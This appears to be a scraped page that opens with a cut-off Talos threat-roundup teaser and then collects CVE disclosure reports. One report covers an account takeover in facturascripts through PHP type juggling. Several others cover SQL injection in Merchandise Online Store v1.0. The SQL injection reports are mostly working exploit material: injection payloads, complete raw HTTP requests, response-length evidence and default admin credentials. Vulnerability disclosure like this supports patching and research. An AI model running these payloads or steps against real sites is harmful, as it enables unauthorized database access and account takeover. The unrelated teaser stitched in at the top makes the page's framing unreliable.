Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 6 and May 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for May 6 to May 13

Account Takeover in GitHub repository neorazorx/facturascripts prior to 2022.07.

**Description**

Hi there i found that forget password functionality can be manipulated and this lead to account takeover. So even if an attacker can takeover low access user to admin accounts. In this bug server is vulnerable to php type juggling attack

**Proof of Concept**

1.  While registering app for first use set DB password starting with "0e" and then random characters in it. so You can add any password starting with 0e
2.  Goto forget password section and add username as admin and new password as "newpass"
3.  Add 0 in database password
4.  Send request and login with new password
5.  Successfully changed password

Reference :-https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09

**Impact**

Account takeover

CVE-2022-1715: Account Takeover in facturascripts

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/?p=view_product&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/?p=view\_product&id=

Vulnerability location: /vloggers\_merch/?p=view\_product&id=,id

\[+\] Payload: /vloggers\_merch/?p=view\_product&id=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/?p\=view\_product&id\=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 29830 

When length (database ()) = 17, Content-Length: 26131

CVE-2022-30401: bug_report/SQLi-14.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/orders/view_order.php?view=user&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=

Vulnerability location: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=,id

\[+\] Payload: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/orders/view\_order.php?view\=user&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 4252 

When length (database ()) = 17, Content-Length: 2510

CVE-2022-30400: bug_report/SQLi-13.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=maintenance/manage_category&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=

Vulnerability location: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=maintenance/manage\_category&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 26268 

When length (database ()) = 17, Content-Length: 26317

CVE-2022-30399: bug_report/SQLi-11.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=orders/view_order&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=orders/view\_order&id=

Vulnerability location: /vloggers\_merch/admin/?page=orders/view\_order&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=orders/view\_order&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=orders/view\_order&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 27212 

When length (database ()) = 17, Content-Length: 25470

CVE-2022-30398: bug_report/SQLi-10.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=inventory/manage_inventory&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=

Vulnerability location: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=5%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=inventory/manage\_inventory&id\=5%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 26978

When length (database ()) = 17, Content-Length: 26988

CVE-2022-30396: bug_report/SQLi-9.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/classes/Master.php?f=delete_cart.

Permalink

Cannot retrieve contributors at this time

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/classes/Master.php?f=delete\_cart

Vulnerability location: /vloggers\_merch/classes/Master.php?f=delete\_cart, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /vloggers\_merch/classes/Master.php?f\=delete\_cart HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30395: bug_report/SQLi-7.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=product/manage_product&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=product/manage\_product&id=

Vulnerability location: /vloggers\_merch/admin/?page=product/manage\_product&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=product/manage\_product&id=5%27%20and%20length(database())%20=17%20--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=product/manage\_product&id\=5%27%20and%20length(database())%20\=17%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 30380

When length (database ()) = 17, Content-Length: 33673

Tag

#php